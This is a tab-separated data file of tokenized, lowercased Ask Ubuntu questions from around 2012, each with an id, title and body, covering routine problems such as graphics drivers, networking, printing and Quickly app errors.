( ralt_switch_for_alts_toggle ) :1+level3 ( ralt_switch_for_alts_toggle ) :2+group ( alts_toggle ) +level3 ( ralt_switch ) +terminate ( ctrl_alt_bksp ) '' } ; xkb_geometry { include `` pc ( pc105 ) '' } ; } ;
155887	problem in app-simple player	file `` /home/rohit/rohit-player/rohit_player/rohitplayerwindow.py '' , line 54 , in on_open_clicked media_files.append ( { `` file '' : f , `` uri '' : file_uri , `` format '' : format } ) nameerror : global name 'media_files ' is not defined i have followed line by line tutorial of rick ! on building a simple player { http : //developer.ubuntu.com/resources/app-developer-cookbook/multimedia/creating-a-simple-media-player/ } but i am stuck on the above mentioned error when i click on open button to select files it just show up on terminal ( `` the above mentioned error '' ) i have till now worked till displaying the list to user i m on 12.04 lts ! thanx in advance
155888	how do i move my top panel ?	i 'm running gnome-shell gnome/openbox , not unity , on a dual display . my top and bottom panels are always on my laptop screen . i really want them on the external monitor when that is plugged in . i 've read a ton of tips about using gconftool-2 and gconf-editor to switch the `` monitor '' key from 0 to 1 for each panel , but doing that has no effect . i can use alt super right to access the panel properties and move the panel to the top / left / right / bottom of my laptop screen , but i ca n't for the life of me move it over to my external monitor . i recently rearranged my desk and do n't know what all i customized six months ago when i was setting up my desktop environment . so one question is ... could i have done something to give control over my panels to something other than gconf-editor ? how would i figure that out ? thanks !
155891	how to use inotifywait in a non-blocking way and mail the results ?	i 've tried several times to test my script , but with no success . this is the script : zenity -- question -- text `` my text '' if [ $ ? -eq 1 ] ; then zenity -- warning -- text `` my text '' else ping -n -c1 192.168.180.112 # print result ( 0 se existir ) echo $ ? if [ $ ? -eq 0 ] ; then scp -r ~/documents/processo/concluido/* posto-ensaios @ 192.168.180.112 : /home/posto-ensaios/documents/processo filename= $ ( inotifywait -e moved_from /home/posto-11v/documents/processo/concluido | sed -r 's/^.*moved_from ( , isdir ) *\s+ ( . * ) $ /\2/g ' ) mail -s `` $ filename '' user @ mail.host < ~/documents/personaproject/programa/scripts/mail.txt mv -- backup ~/documents/processo/concluido/* ~/documents/personaproject/processos_terminados zenity -- info -- text= '' my text '' else zenity -- warning -- text `` my text '' fi fi i 've tried to run with the sleep command with `` pipe '' after sed and to change the order of the commands . when running the script in their terminal the problem is that inotify always keeps waiting for an action ... i need to guarantee that files are copied , moved and the $ filename is sent in email ... any help ? thanks !
155895	static ip configuration causing apt-get errors	i am getting errors when running apt-get update or when installing new packages . although this only happens when the server configured for a static ip address . changing the configuration back to dhcp and restarting networking fixes the problem , although i want a static ip . once it is working i can change back to my static ip address and restart networking . although this only works until i restart the server ( restarting the router is ok ) , and then i start getting the same errors and have to switch back to dhcp . any ideas on what could be causing this or tips on troubleshooting it ? thanks in advance . here is my static ip configuration : auto eth0 iface eth0 inet static address 192.168.2.2 netmask 255.255.255.0 gateway 192.168.2.1 the apt-get update errors go something like this : a few of these ign http : //us.archive.ubuntu.com precise-backports inrelease then a lot of these err http : //security.ubuntu.com precise-security release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) and a lot of these w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname )
155896	no sound on new gaming pc	well , as you can probably tell by the title , i have no sound . i recently built a new gaming pc , and installed 12.04 onto it . obviously , i have alsa and pulseaudio installed , but i do n't have /etc/asound.conf , if that matters . i also ca n't tell what my sound driver is , mainly because i do n't know how to find it . i did a google search about it , but to no avail . there is only one sound i seem to be getting : a white noise-ish , high-frequency sound coming from the headphones . note : i have connected the case audio to the hd audio header , not the ac'97 , if that matters ( though i still get no sound through the speakers , which are connected to the motherboard directly ) . also , my sound card is : intel corporation panther point high definition audio controller .
155897	how to make nautilus the default file manager in lxde	correcting this question , i 've realised that i was - and still am - unable to sync folders with ubuntu one , because pcmanfm is still my default lxde file manager , despite the fact that i 've changed the panel settings as i should have done ( at least i think so ) and replaced the entry `` pcmanfm % s '' with `` nautilus '' . yet , how can i actually change it ? kind regards , schlossblick
155898	how can i get geforce gt520 working ?	i have this desktop : i7 2600 8 gb ram ddr3 board intel dh61ww geforce nvidia gt520-cn 2gb ddr3 i just installed ubuntu 12.04 64-bit ( kernel 3.2.0-23-generic ) . i want to setup two samsung 22 '' led monitors and get my video card drivers working . i downloaded and installed nvidia driver 295.59 . i tried the following with that driver and also with 302.17 . i ran these commands : sudo apt-get update sudo apt-get upgrade sudo apt-get install build-essential linux-headers- $ ( uname -r ) , sudo apt-get remove -- purge nvidia* , sudo apt-get remove -- purge xserver-xorg-video-nouveau vim /etc/modprobe.d/blacklist.conf in the vim text editor , i added the following lines to blacklist.conf : blacklist vga16fb blacklist nouveau blacklist rivafb blacklist nvidiafb blacklist rivatv then i ran these commands : sh nvidia.run sudo service lightdm start i rebooted , and after rebooting ran : nvidia-xorgconf after reboot i got a screen resolution of 800x600 . i ran nvidia-settings and it said : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . i changed xorg.conf slightly to set up a resolution to work property . i do n't have any image on my monitor and i dont have any option in the nvidia x server settings . $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf119 [ geforce gt 520 ] ( rev a1 ) $ egrep -i 'glx|nvidia ' /var/log/xorg.0.log [ 12.005 ] ( ii ) loadmodule : `` glx '' [ 12.005 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 12.575 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 12.585 ] ( ii ) nvidia glx module 302.17 tue jun 12 16:22:45 pdt 2012 [ 12.585 ] ( ii ) loading extension glx [ 13.037 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) [ 13.044 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=3 ( /dev/input/event10 ) [ 13.044 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=7 ( /dev/input/event9 ) $ glxinfo | grep direct xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig
155899	my minimise , maximise and close buttons have dissapeared !	i 've somehow managed to get ride of my minimise , maximise and close button on my laptop . i use google chrome at the moment , but it 's on all my programmes , not just on chrome - any help ?
155908	can not ping any computers on lan	i havem't been able to find a straight forward answer on this yet . i 'm hoping people here are able to help ! keep in mind that i 'm a complete beginner at this - this is the first installation i 've done for any linux systems ever so please keep that in mind when answering this question . we are a complete windows shop , using nothing but microsoft products but looking into the value of openstalk however have been having problems getting ubuntu server installed and speaking to the network . the machine is getting an ip address which is telling me that some sort of dhcp activity is working but i 'm not able to ping any computer on our network as well as not able to connect to the internet . every time i try to ping i 'm getting ; destination host unreachable i 've tried using modifying the resolv.conf file with our static details to match my windows 7 machine still with no luck . even tried disabling the firewall on ubuntu server 11 and no luck . any ideas ? please let me know if there is any information you need from the server and i 'll post up .
155912	how can i print a file using a printer connected to a different machine on the same lan	what 's the simplest/best way to print files from any local machine , using a printer connected to only one of them .
155914	i have removed my password now what should i answer when it asks for password ?	i used pass word earlier but for now i removed password and used to login without password . now some actions need administrators aurthentication through password even to set password i it asks for password but actually there is no password and so it does n't authenticates any actions that need administrators authentication and when i try to use my old password but it also does n't works . now what should i do for this case ?
155916	do accomplishments look at launchpad 's history	i was awarded the registered on launchpad trophy when i signed in . will accomplishments look in the launchpad history to see that i have previously submitted bugs etc ? it 's been a couple days now and nothing so far . thinking it may only register bugs reported after install .
155918	how works a loop device ( especially a mounted os image )	i know , it 's a often asked question on many boards and i have read the wikipedia article . but those articles are n't satisfactory . i want to know it because i have ubuntu 12.04 for android on my chrooted htc one x . for normal file systems like a disk or a hard drive image it seems to be clear but how works a operating system loop device ? my thought is , that a simualted disk is a static thing which has no own life but an operating system has it 's own life with processes and threads which are running . notices the kernel ( here android ) that the loop device is an os image which needs a special mounting/handling ? how is the native kernel in contact with the virtual os so that i can use an os within an os ? obviously it 's mounted like a file system but communicates it with the kernel via the loop back adapter or has it nothing to do with that ? ( just the normal network communication ) i hope my problem is n't asked to complicated . thanks for your help .
155919	how can i use ubuntu to rescue files from an ntfs drive ?	i reinstalled windows on the laptop of my daughter . before doing this we made a copy of her music , pictures and so on on an external drive which was formatted in ntfs . unfortunately , the folder we created for the backup was empty ( i checked after i reinstalled windows ) . today a miracle happened , as suddenly the data were back but when i tried to copy them to another place they disappeared again . checking the external drive with disk utility i got the message `` filesystem is not clean '' . is there a way to recover the data ? preferred solution would be a tool with a gui . the drive i need to repair is formatted in ntfs and is connected via usb to laptop .
155921	ca n't run flightgear from playdeb on ubuntu 12.04 32bits	trying to run flightgear 2.6 from playdeb on ubuntu 12.04 lts 32bits , i get this error every time : fgfs : symbol lookup error : /usr/lib/libsgtsync.so.2.6.0 : undefined symbol : svn_subr_version thanks for help .
155922	how can i tweak this split-tar-gz-archive script ?	i came across this shell script that can be used to split an entire directory across multiple compressed files . i am interested in making a minor tweak to this script . lets say i have n gb of files in a directory . i do not want the contents of a particular folder to be split across multiple tar files but inside the same file . i want the n mb folder to be fit within a single compressed file and the remaining ( n gb -n mb ) split across multiple files . i am not sure whether it is possible with this script . i was looking forward to some suggestions . though the script has been well documented , it is quite complex to understand for me
155929	how do i install ubuntu on a windows xp laptop with no boot disk ?	i have hp pavalion with no boot disk . all of the hard drive programs are erased . can ubuntu help ? if the answer is yes would you give me steps for the installation .
155934	print failure from 12.04 to xp	after upgrading to 12.04 i lost the ability to samba print via an xp machine . did fresh 12.04 install then added a new printer . loaded the correct drivers ( canon pixma4200 ) tried a test page . printer seems to respond normally but does n't print anything then locks up . have to power cycle printer to unfreeze it . tried two different printers on two different xp boxes . both freeze . any possible solution ? thanks
155935	wireless hardware not found on hp probook 4510s	is there a way i can install the wireless propriety drivers offline ? as i can not connect to the internet and there is no lan connection availability . maybe i can get the files separately and install them through terminal ? thanks in advance .
155947	virtualbox guest additions wo n't install on ubuntu server 12.04	i am trying to install vitrualbox 's guest additions on ubuntu server 12.04 , but keep getting an error . i am using the following command sudo ./vboxlinuxadditions.run -- nox11 and get the following error :
155962	how to change font size in skype 4.x ?	i tried using `` qtconfig '' but that did n't help . ( even changing the style in skype , then using qtconfig wo n't show any effect . ) where could i make the fonts larger ? ( ubuntu 's accessibility settings wo n't affect it either . )
155972	maximize , minimize and close buttons are either not present or not working in lubuntu	as the title indicates , the maximize , minimize , and close buttons are either not present or not working on my lubuntu desktop . in fact , it only seems to be google chrome that displays the buttons at all , and only the close button works in chrome , maximize and minimize do n't do anything . when i use regular ubuntu , they 're all there just fine but not on lubuntu . this all seemed to occur after i hooked my netbook up to an external monitor while using lubuntu . not sure if that had anything to do with it or not , but it seemed too big of a coincidence to not mention . any ideas what the cause and a fix might be ? thanks in advance .
155981	how to force text to resize together with window ?	i have some text in my app window . i 'd like it to resize if someone resizes the app window ( if window gets bigger , the text gets bigger too ) . is this possible to achieve using quickly , glade and python ?
155985	how do i change local display resolution via ssh ?	i have a machine running ubuntu server 12.04 lts and i 'm having problems with the local monitor . the dell flat panel i 'm using only displays this message while the computer running : `` can not display this video mode '' and then the information : `` optimum resolution 1280x1024 60hz '' . i 'm fairly new to using an operating system wholly via command line but i 'm learning fast . : ) i can access the server fine via ssh so using it is not a problem . however , for where it is positioned at the moment , it would be much more convenient to use the computer locally . i 'm just wondering how to change the local screen resolution via ssh to something usable by my monitor . thanks for your time ! btw : i have also tried switching displays and i still have the same problem . also btw : i tried putting in the xrandr command and all i get back is : ca n't open display
155987	trouble communicating with router dhcp ?	my home network is has problems regarding linux computers , two ubuntu and two mint . i have had a look at the log files and searched the internet regarding the solution . i can not find a whisker of a solution . one of the mint computers connects fine , the other three appear have this same problem . a ps3 , mac and all windows connect fine . i 've tried : disabling ipv6 ( i do n't think my router is ipv6 friendly ) using usb wlan device , internal wlan device , and and ethernet cable ( all this work on other networks/windows ) so i suspect this is a problem with my computer ( s ) not being able to communicate with my router in a common language . but i 'm not much of an expert . i hope someone will care to look at my log file i believe the answer is in here . jun 25 22:57:01 joshua-ideapad-z570 networkmanager [ 852 ] : < info > ( eth0 ) : device state change : ip-config - > disconnected ( reason 'user-requested ' ) [ 70 30 39 ] jun 25 22:57:01 joshua-ideapad-z570 networkmanager [ 852 ] : < info > ( eth0 ) : deactivating device ( reason 'user-requested ' ) [ 39 ] jun 25 22:57:01 joshua-ideapad-z570 networkmanager [ 852 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 3459 jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) starting connection 'wired connection 1' jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > dhclient started with pid 3465 jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) beginning ip6 addrconf . jun 25 22:57:04 joshua-ideapad-z570 dhclient : internet systems consortium dhcp client 4.1-esv-r4 jun 25 22:57:04 joshua-ideapad-z570 dhclient : copyright 2004-2011 internet systems consortium . jun 25 22:57:04 joshua-ideapad-z570 dhclient : all rights reserved . jun 25 22:57:04 joshua-ideapad-z570 dhclient : for info , please visit https : //www.isc.org/software/dhcp/ jun 25 22:57:04 joshua-ideapad-z570 dhclient : jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . jun 25 22:57:04 joshua-ideapad-z570 networkmanager [ 852 ] : < info > ( eth0 ) : dhcpv4 state changed nbi - > preinit jun 25 22:57:04 joshua-ideapad-z570 dhclient : listening on lpf/eth0/f6 : d1 : f2 : c4 : b1:6f jun 25 22:57:04 joshua-ideapad-z570 dhclient : sending on lpf/eth0/f6 : d1 : f2 : c4 : b1:6f jun 25 22:57:04 joshua-ideapad-z570 dhclient : sending on socket/fallback jun 25 22:57:04 joshua-ideapad-z570 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 jun 25 22:57:04 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:04 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:07 joshua-ideapad-z570 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 4 jun 25 22:57:08 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:08 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:11 joshua-ideapad-z570 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 8 jun 25 22:57:11 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:11 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:19 joshua-ideapad-z570 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 10 jun 25 22:57:19 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:19 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:24 joshua-ideapad-z570 networkmanager [ 852 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . jun 25 22:57:24 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... jun 25 22:57:24 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... jun 25 22:57:24 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . jun 25 22:57:28 joshua-ideapad-z570 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 jun 25 22:57:28 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:28 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:29 joshua-ideapad-z570 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 10 jun 25 22:57:29 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:29 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:31 joshua-ideapad-z570 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 5 jun 25 22:57:31 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:31 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:36 joshua-ideapad-z570 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 11 jun 25 22:57:36 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:36 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:39 joshua-ideapad-z570 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 13 jun 25 22:57:39 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:39 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:47 joshua-ideapad-z570 dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 14 jun 25 22:57:47 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:47 joshua-ideapad-z570 dhclient : discarding packet with bogus hlen . jun 25 22:57:49 joshua-ideapad-z570 networkmanager [ 852 ] : < warn > ( eth0 ) : dhcpv4 request timed out . jun 25 22:57:49 joshua-ideapad-z570 networkmanager [ 852 ] : < info > ( eth0 ) : canceled dhcp transaction , dhcp client pid 3465 jun 25 22:57:49 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... jun 25 22:57:49 joshua-ideapad-z570 networkmanager [ 852 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... if i can add anything else which may help the diagnosis please add a comment .
155990	how can i enable unity 3d on an fx5200 graphics card ?	how can i change from unity 2d to 3d on ubuntu 12.04 ? i am running an amd nx2100 with 512k memory and nvidia fx5200 i 've tried numerous cures/downloads/fixes noted within ask ubuntu , but when ever i run myunity i will always get this same message : your ubuntu 12.04 is running in 2d mode . many features will not be available . most everything within the myunity menu is grayed out . i am new to ubuntu and have been working on this for more than two weeks to no avail .
155995	how do i prevent adobe 's pdf reader from opening a pdf within firefox ?	i 've installed adobe 's pdf reader . however , now when i download a pdf using firefox , often adobe 's reader loads the pdf in a firefox reader . how do i set the default behaviour to storing the pdf , rather then loading it within firefox ?
155996	why is my quickly app full of fail ?	i tried to use quickly on ubuntu 12.04 to create an application , but it does not behave as described in that linked page . i do n't get a popup when creating the application ( see error below ) . % quickly create ubuntu-application foo creating project directory foo creating bzr repository and committing launching your newly created project ! ( foo:16847 ) : glib-gio-error ** : settings schema 'org.gnome.desktop.interface ' is not installed congrats , your new project is setup ! cd /tmp/foo/ to start hacking . it creates a project , but when i try to run , it crashes and burns : % cd foo % quickly run ( foo:22639 ) : glib-gio-error ** : settings schema 'org.gnome.desktop.interface ' is not installed is this because i 'm not using gnome-shell ? what can i do to get a working project ? ( edit : as a side note , i 'd be willing to debug this myself , but i do n't even get a traceback . what do i have to do to get quickly to give me a traceback ? )
155997	why does `` quickly share -- ppa share '' abort with a `` ca n't create '' error ?	i can not figure out what i am doing wrong . the package builds ok with quickly package , i could submit it , but i can not update my ppa . here is what i got : desgua @ desguai7 : ~/quickly/sbk $ quickly share -- ppa sbk get launchpad settings launchpad connection is ok ... ... ... .an error has occurred when creating debian packaging error : ca n't create or update ubuntu package error : share command failed aborting edit the name of my ppa was wrong , but even using ppa : desgua/sbk still does n't work : desgua @ desguai7 : ~/quickly/sbk $ quickly share -- ppa ppa : desgua/sbk get launchpad settings traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/share.py '' , line 101 , in launchpad = launchpadaccess.initialize_lpi ( ) file `` /usr/lib/python2.7/dist-packages/quickly/launchpadaccess.py '' , line 91 , in initialize_lpi allow_access_levels= [ `` write_private '' ] ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/launchpad.py '' , line 539 , in login_with credential_save_failed , version ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/launchpad.py '' , line 359 , in _authorize_token_and_login service_root , cache , timeout , proxy_info , version ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/launchpad.py '' , line 198 , in __init__ credentials , service_root , cache , timeout , proxy_info , version ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/resource.py '' , line 460 , in __init__ self._wadl = self._browser.get_wadl_application ( self._root_uri ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/_browser.py '' , line 299 , in get_wadl_application response , content = self._request ( url , media_type=wadl_type ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/_browser.py '' , line 242 , in _request str ( url ) , method=method , body=data , headers=headers ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/_browser.py '' , line 211 , in _request_and_retry url , method=method , body=body , headers=headers ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 1414 , in request ( response , new_content ) = self._request ( conn , authority , uri , request_uri , method , body , headers , redirections , cachekey ) file `` /usr/lib/python2.7/dist-packages/launchpadlib/launchpad.py '' , line 126 , in _request launchpadoauthawarehttp , self ) ._request ( *args ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/_browser.py '' , line 130 , in _request redirections , cachekey ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 1196 , in _request ( response , content ) = self._conn_request ( conn , request_uri , method , body , headers ) file `` /usr/lib/python2.7/dist-packages/httplib2/__init__.py '' , line 1138 , in _conn_request raise servernotfounderror ( `` unable to find the server at % s '' % conn.host ) httplib2.servernotfounderror : unable to find the server at api.launchpad.net error : share command failed aborting any ideas ? how could i troubleshot this error ?
155999	how do i change the number of kernels that stay on boot menu ?	i 'm having an issue with the current kernel and was recommended to install the newest mainline kernel . however , with only two kernel boot options ( 3.2.0-24 and 3.2.0-25 ) i 'm afraid i 'll lose the working v3.2.0-24 if i install the mainline debian package . where can i set how many back-kernels are left on the system ?
156003	how can i programmically set the gnome-terminal title ?	how can i programmically set the gnome-terminal title ? i 've tried gnome-terminal -- title= '' bla '' but this opens a new terminal window while outputting $ gnome-terminal -- title=bla xlib : extension `` randr '' missing on display `` :0.0 '' .
156005	how to disable the password showing up when start chrome	when i installed chrome and logging in my gmail , ubuntu ask me to protect my password with a password . how do i disable this or change password ?
156010	how do i compile and install gnome-tweak-tool from its git repository ?	how i install the gnome tweak tool from git : //git.gnome.org/gnome-tweak-tool ? i have install the synaptic
156011	why wo n't my ftp server let me upload ?	i am using ubuntu server with ftp , and i do n't have permision to upload files . i think this is because of ubuntu , how do i change the permisions of files on ubuntu server ? 12.04 .
156013	how do i get disk utility to read smart data from usb drives ?	when i plug in a external usb drive and want to check its s.m.a.r.t . status in disk utility ( palimpsest ) i can not because the option is greyed out . is there an option somewhere to enable this feature ? it works fine for internal ide/sata drives . i know the usb drive supports s.m.a.r.t . because i can use smartmontools and front end gsmartcontrol to get the information , but i 'd rather not have to use use it since palimpsest is already installed by default . thanks
156017	gamepad setup ignored by games	i recently got a wired ( usb ) xbox 360 gamepad . it was nearly plug-and-play on my laptop running ubuntu 12.04 . however , some control axes were mixed up . i used jstest-gtk to reconfigure the mapping and jscal-store to ( supposedly ) save the new configuration . however , when i run xonotic or nexuiz ( first person shooters ) , they still uses the original mixed-up mapping . how do i make these games recognize the new configuration ? btw , i 'm more concerned about xonotic working , i really could n't care less about nexuiz . please no rants about why i should stick with a mouse and keyboard for gaming . [ : - ) thanks in advance .
156018	help on app directories ?	i am developing a program using glade + gtk through quickly , ubuntu 12.04 . if a want to include a file .xml , where i have to create this file ? is there any default folder for that ? at the end when i deploy the app , do i have to put any extra setting anywhere ? its a bit confusing , i have java background , and in java you include everything on the root folder of the app and the code can read the files , but not sure in here .
156026	difference between livecd , liveusb , full-install , and persistence ?	i am currently running ubuntu as a guest vm on a win 7 host via virtualbox , but i would like to have a portable version of ubuntu when i am not using my laptop . i am unsure as to the difference between the following : 1 ) livecd with persistence ; 2 ) livecd without persistence ; 3 ) liveusb with persistence ; 4 ) liveusb without persistence ; 5 ) full-install . i have a usb flash drive ( 32gb ) , and i also have empty dvds lying around . i know that persistence means that data can be saved , but i am unsure as to which option to choose . what is the difference between a liveusb and a full-install on a usb thumbdrive and why would i want to pick one over the other ? thanks for any help .
156027	part-time kid-pc : is wubi better , or ubuntu in a virtual machine ?	i have a new win7 box and wanted to try out ubuntu ( total noob , no experience in linux ) . which option will have the better performance ( side by side , or in a vm ) . i 'm guessing sidebyside , but figured i 'd ask anyways . my original intent was to create a quick/dirty way for kids to go online and not kill my pc with crap . thanks newb nooberson iii
156040	can not authenticate libopenexr6 in update manager	i got this message when i was using update manager the action would require the installation of packages from not authenticated sources- details-libopenexr6 please help , how can i authenticate libopenexr6 ?
156041	skype 4.0 keeps crashing	i just installed skype 4.0 for linux and for some reason it crashed almost everytime i click on certain actions like mark all as viewed , accept an invitation etc ... apparently it seems to work well for other and i could n't find any help on that type of behaviour online . i do get the same behaviour on my box at work which makes me believe it comes from something i use but what ? thanks for any pointers .
156042	click and drag from touchpad stops working	i 've got a samsung notebook ( np-qx412-s01au ) with a touchpad / clickpad . i 'm running 12.04 precise . when i first log into my computer , the touchpad behaves exactly as expected and desired . the longer i stay logged in , it slowly degrades . i 'll try describe it . there are 3 ways of `` dragging '' on this clickpad : ( physical ) click and hold with one finger , and drag around while still holding it down . all with one finger . ( physical ) click and hold with one finger , then with another finger drag around to move cursor . double tap ( not a physical click ) and on the second tap , hold and drag . i most naturally use option 1 , but here 's how it works : when i first turn on , options 1 , 2 and 3 all work . after a while , only options 2 and 3 work . later still , only option 3 works . restarting x causes all 3 to work again . i 've compared the output of `` synclient '' in each of the states , and there was no difference . anybody know what to look at ? or at the very least , a command i can run to `` restart '' the mouse driver without restarting x ?
156045	how do i triple-boot ubuntu , fedora and windows 7 ?	i have an acer laptop with windows 7 pre installed . i want to install ubuntu and fedora and make a triple boot configuration . i want to know how ? i am a newcomer to linux and i need help .
156048	`` dd : unknown operand if '' error when creating a live usb stick on mac os x	whenever i try completing this step i just get : dd : unknown operand if i 've tried this many times with every variation i can think of . any help ? here 's a link to the tutorial : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx
156057	why does n't my mouse work in gnome-shell at 30-bit color depth ?	title pretty much says it . keyboard shortcuts are fine . but the mouse interaction , clicking on anything but desktop icons is ... not happening .
156059	input/output error copying files from internal harddrive to external drive . ( ubuntu running from live cd )	i am attempting to transfer files from an internal hard drive to an external hard drive . both mount fine and i can view files in them . when i try to copy a few of the image files they fail and pass an input/output error . however other files work fine . the files are under 1 mb in size . the reason i am attempting to do this with a ubuntu live cd is that the windows no longer boots and trying to backup my files before i reformat . what do i do now ? is there any non intrusive way to check to see if maybe the files are corrupt or if its maybe the cable . thanks , jacob
